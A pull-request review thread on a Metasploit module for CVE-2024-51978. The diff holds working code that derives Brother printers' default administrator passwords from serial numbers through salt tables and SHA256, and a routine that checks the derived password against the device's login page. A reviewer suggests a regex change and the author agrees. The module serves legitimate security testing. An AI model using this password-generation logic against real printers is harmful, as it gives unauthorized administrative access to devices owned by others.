modules/auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978.rb

```diff
@@ -0,0 +1,418 @@
+    'yXM4cZKt', '9BJPKtaC', 'NVNpe4kJ', 'uSyxGxbz', 'h5zTpV3U', 'TAajcQ4h', 'VjYMEusS', 'Wpj237VG',
+    'yAjHYVVV', 'Hb6k7Cwe', 'yZbuDBEi', 'S4wpBmZM', 'DwFra8wk', 'j#Pk5r9W', 'PjkfS9WB', 'gHf3YGA3',
+    'ihDtdUCu', 'KARzJDfR', 'M7fApB5U', 'MiD44gRC', 'RdEM8y5W', '4GsGuPag', 'pETQc4k2', 'pZZu7Ras',
+    'AJReAUBy', 'EAMmQsWe', 'BeC2XJi8', 'PujT2eRf', '2UXLeAJu', 'hMPbY3MQ', 'QeawRP*p', 'SbCbW9Tf',
+    'EhNNtLyj', 'B8RjceGs', 'LaydmLeD', 'JFR7T47f', 'WCbAdTfm', 'srN9gNSE', 'gAn7h8Yp', '4PnTKVse',
+    'HDxGwLsN', 'tR8XUSRg', 'wLe-3Xf8', 'zH7cpxsd', 'tCc5sWFX', '3hzTj5BS', 'hLK6f&g4', 'tCzzSsm7'
+  ]
+
+  def generate_default_password(serial, salt_lookup_index: 254, salt_data: nil)
+    fail_with(Failure::BadConfig, 'SaltLookupIndex must be between 0 and 255') unless salt_lookup_index.between?(0, SALT_LOOKUP_TABLE.length - 1)
+
+    unless salt_data && salt_lookup_index != 0
+      salt_table_index = SALT_LOOKUP_TABLE[salt_lookup_index]
+
+      fail_with(Failure::BadConfig, 'unknown salt table data at salt table index') unless SALT_DATA_TABLE[salt_table_index]
+
+      salt_data ||= SALT_DATA_TABLE[salt_table_index].unpack('C*')
+    end
+
+    fail_with(Failure::BadConfig, 'SaltData must be 8 bytes') unless salt_data.length == 8
+
+    vprint_status("Generating default password with salt lookup index #{salt_lookup_index} and salt data #{salt_data.pack('C*')}")
+
+    buff = serial[0..15]
+
+    buff << [
+      salt_data[7] - 1,
+      salt_data[6] - 1,
+      salt_data[5] - 1,
+      salt_data[4] - 1,
+      salt_data[3] - 1,
+      salt_data[2] - 1,
+      salt_data[1] - 1,
+      salt_data[0] - 1
+    ].pack('C*')
+
+    hash = Digest::SHA256.digest(buff)
+
+    hash64 = Base64.strict_encode64(hash)
+
+    result = ''
+
+    0.upto(7) do |idx|
+      c = hash64[idx]
+
+      case c
+      when 'l'
+        result << '#'
+      when 'I'
+        result << '$'
+      when 'z'
+        result << '%'
+      when 'Z'
+        result << '&'
+      when 'b'
+        result << '*'
+      when 'q'
+        result << '-'
+      when 'O'
+        result << ':'
+      when 'o'
+        result << '?'
+      when 'v'
+        result << '@'
+      when 'y'
+        result << '>'
+      else
+        result << c
+      end
+    end
+
+    result
+  end
+
+  def validate_password(password)
+    vprint_status('Attempting to validate password')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'general', 'status.html')
+    )
+
+    unless res
+      vprint_error('HTTP GET connection failed')
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    unless res.code == 200
+      vprint_error("Unexpected HTTP GET response code: #{res.code}")
+      return Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    unless res.body =~ /input type="password" id="LogBox" name="([a-zA-Z0-9]+)"/
```

Comment:
```suggestion
    unless res.body =~ /input type="password" id="LogBox" name="([^"]+)"/
```

Wouldn't this make more sense, or are you sure that the name can't contain anything than letters and numbers, and not things like `_` or `-`?

Reply:
I only had two models to test against so cannot be sure all models/firmware versions behave the same. Your regex is better so lets go with that one, thanks Julien!